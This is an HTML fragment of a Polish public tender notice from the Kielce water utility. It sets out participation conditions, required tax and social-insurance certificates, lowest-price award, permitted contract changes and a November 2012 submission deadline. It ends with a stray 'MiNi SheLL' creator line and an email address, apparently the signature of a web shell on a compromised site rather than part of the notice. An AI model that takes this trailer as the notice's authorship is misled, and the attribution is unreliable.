<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie. Ocena spełniania w/w warunku zostanie dokonana na podstawie Oświadczenia Wykonawcy o spełnieniu warunku udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie. Ocena spełniania w/w warunku zostanie dokonana na podstawie Oświadczenia Wykonawcy o spełnieniu warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie. Ocena spełniania w/w warunku zostanie dokonana na podstawie Oświadczenia Wykonawcy o spełnieniu warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie. Ocena spełniania w/w warunku zostanie dokonana na podstawie Oświadczenia Wykonawcy o spełnieniu warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie. Ocena spełniania w/w warunku zostanie dokonana na podstawie Oświadczenia Wykonawcy o spełnieniu warunku udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Pełnomocnictwo do podpisania oferty i załączników do niej oraz umowy w przypadku jego udzielenia.

2.Oświadczenie o solidarnej odpowiedzialności za należyte wykonanie zobowiązania (w przypadku  podmiotów występujących wspólnie).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. W uzasadnionych przypadkach dotyczących:  wstrzymania, zaprzestania produkcji, wycofania z rynku lub zmiany marki, Zamawiający przewiduje możliwość zmiany umowy w zakresie oferowanego asortymentu z zastrzeżeniem, iż oferowany zamiennik musi odpowiadać parametrom co najmniej takim jak oferowany produkt z gwarancją zachowania oferowanej ceny.

2.W przypadku ustawowej zmiany stawki  podatku od towarów i usług - VAT Zamawiający przewiduje możliwość zmiany umowy z zastrzeżeniem, iż oferowana cena netto nie ulegnie zmianie. 

3. Zamawiający dopuszcza możliwość wcześniejszego wygaśnięcia  umowy w przypadku osiągnięcia  kwoty brutto przeznaczonej na zakup przedmiotu zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wod-kiel.com.pl.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wodociągi Kieleckie Sp. z o.o. Biuro Obsługi Klienta, 25-701 Kielce, ul. Krakowska 64.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.11.2012 godzina 11:45, miejsce: Wodociągi Kieleckie Sp. z o.o.Biuro Obsługi Klienta
Kielce, ul. Krakowska  64.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com